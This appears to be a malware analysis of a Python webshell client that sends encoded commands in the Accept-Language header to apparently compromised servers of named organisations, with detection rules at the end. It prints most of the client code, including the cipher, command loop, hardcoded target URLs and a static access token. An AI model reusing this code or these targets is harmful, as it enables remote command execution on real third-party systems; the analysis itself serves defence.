Skip to main content

Framework Components

The Python framework consists of three main scripts, each targeting different infrastructure:
  • connect.py - Targets uniforms.flydubai.com with custom encoding
  • rce5.py - Targets jordandesert.org.jo with custom encoding
  • RCE4.py - Targets 193.188.88.156 with plaintext commands

Command Encoding Mechanism

Custom Substitution Cipher

Two of the scripts (connect.py and rce5.py) implement a custom character substitution cipher: 
def encode(input_string):
    # Define the original and replacement strings
    en = rf"AB_CDEFG.HIJKLM!$%&*()?NOPQR-STUVWXYZabcdefghijklmnopqrstu=vwxyz0123456789/";
    de = rf"Qk3\afcPbYJTGywSv=0Egdx62X-NRVz!~$%_*()?Uq7os1ijFMuLOetCl98K5hBDn4.prWAHmIZ";
    # Create a translation table
    translation_table = str.maketrans(en, de)
    # Encode the input string using the translation table
    encoded_string = input_string.translate(translation_table)
    return encoded_string

Encoding Analysis

The cipher performs character-by-character substitution: Original alphabet (en): 
AB_CDEFG.HIJKLM!$%&*()?NOPQR-STUVWXYZabcdefghijklmnopqrstu=vwxyz0123456789/
Substitution alphabet (de): 
Qk3\afcPbYJTGywSv=0Egdx62X-NRVz!~$%_*()?Uq7os1ijFMuLOetCl98K5hBDn4.prWAHmIZ
Example transformations:
  • whoami → (encoded) → specific character sequence
  • Commands are obfuscated before transmission
  • Server-side ASP script reverses the encoding
This simple substitution cipher provides minimal obfuscation against automated detection but is easily broken through frequency analysis.

Remote Execution Function

All three scripts share a similar remote_exec() function that handles command transmission:

With Encoding (connect.py, rce5.py)

def remote_exec(target, cmd):
    headers["Accept-Language"] = cmd
    try:
        r = requests.get(target,headers=headers)
        if r.status_code == 200:
            data = r.text
        else:
            print(r.text)
            return
    except Exception as e:
        print(e)
        return
    try:
        dataq = data.split('\n')[:-1]
    except:
        print(dataq)
        return
    for x in dataq:
        print(x)

Without Encoding (RCE4.py)

def remote_exec(target, cmd):
    headers["Accept-Language"] = cmd
    try:
        r = requests.get(target,headers=headers,verify=False)
        if r.status_code == 200:
            data = r.text
        else:
            print(r.text)
            return
    except Exception as e:
        print(e)
        return
    try:
        dataq = data.split('\n')[:-1]
    except:
        print(dataq)
        return
    for x in dataq:
        print(x)
Key differences:
  • RCE4.py adds verify=False to bypass SSL certificate validation
  • Commands in RCE4.py are sent in plaintext (no encoding)
  • All scripts use GET requests with custom headers

Interactive Shell Interface

Readline Integration

The scripts implement command-line completion using Python’s readline: 
def complete(self, text, state):
    if state == 0:
        if len(text) == 0:
            self.matches = [s for s in self.options.keys()]
        elif len(text) != 0:
            self.matches = [s for s in self.options.keys() if s and s.startswith(text)]
    try:
        return self.matches[state] + " "
    except IndexError:
        return None

readline.set_completer(complete)
readline.parse_and_bind('tab: complete')
readline.set_completer_delims('\n')
This provides tab-completion functionality for the operator.

Command Loop

The main execution loop follows this pattern: 
runingshell = True
while runingshell:
    cmd = input("[webshell]> ").strip()
    args = cmd.lower().split(" ")
    if args[0] == "exit":
        runingshell = False
    elif args[0] == "help":
        show_help()
    else:
        cmd = encode(cmd)  # Only in connect.py and rce5.py
        remote_exec(TargetURL, cmd)

Target Selection System

connect.py (flydubai.com)

while True:
    print('select your Target')
    print('1. uniforms.flydubai.com')
    print('0. exit')
    print('--------------------')
    while True:
        userinput = int(input(' ------ > ').strip())
        if userinput == 0:
            print('good bye commonder !')
            exit()
        elif userinput == 1 :
            TargetURL = "https://uniforms.flydubai.com/images/flash/test9/m0s.phto"
            break
        else:
            print('wrong input')

rce5.py (jordandesert.org.jo)

while True:
    print('select your Target')
    print('1. jordandesert.org.jo')
    print('0. exit')
    print('--------------------')
    while True:
        userinput = int(input(' ------ > ').strip())
        if userinput == 0:
            print('good bye commonder !')
            exit()
        elif userinput == 1:
            TargetURL = "http://www.jordandesert.org.jo/CMS/Uploads/m0s.aspx"
            break
        else:
            print('wrong input')

RCE4.py (193.188.88.156)

while True:
    print('select your Target')
    print('1. 193.188.88.156')
    print('0. exit')
    print('--------------------')
    while True:
        userinput = int(input(' ------ > ').strip())
        if userinput == 0:
            print('good bye commonder !')
            exit()
        elif userinput == 1:
            TargetURL = "http://193.188.88.156/images/m0s.php"
            break
        else:
            print('wrong input')

HTTP Header Configuration

All scripts use identical header configuration: 
headers = {
"Accept-Captcha":"am=JgAAgP7jP38JwxmUgBgbuF8P_Nmlh2EEBhzhIQOBCEgGdAeWqYD_xNXr3UBFH35AAgACOJqOmhmdA2KVQwAEsGJYhhEAAAAAAAAAAA",
"Accept-Language" : "whoami",
"User-Agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
}
Analysis:
  • Accept-Captcha: Static token, possibly used for authentication or session tracking
  • Accept-Language: Dynamically updated with commands (encoded or plaintext)
  • User-Agent: Mimics Chrome 120 on Linux to blend with legitimate traffic

Security Implications

Strengths

  1. Custom encoding reduces signature-based detection
  2. HTTP header tunneling evades basic inspection
  3. Interactive interface provides operator flexibility
  4. Target management allows multi-target operations

Weaknesses

  1. Hardcoded targets reveal compromised infrastructure
  2. Static Accept-Captcha token serves as unique IOC
  3. Simple substitution cipher easily reversed
  4. No authentication on webshell side (any request with correct header works)
  5. Plaintext storage of target URLs and encoding logic

Detection Strategies

Network Detection

Alert on HTTP requests containing:
- Accept-Captcha header with value starting with "am=JgAAgP7jP38J"
- Unusual Accept-Language header values (non-language codes)
- GET requests to image directories returning command output

Behavioral Detection

  • Repeated GET requests to static resources (images/flash/ directories)
  • Responses from image files containing command-line output patterns
  • HTTP 200 responses from .phto, .aspx, .php files in image directories

Build docs developers (and LLMs) love

Get started for freeTalk to us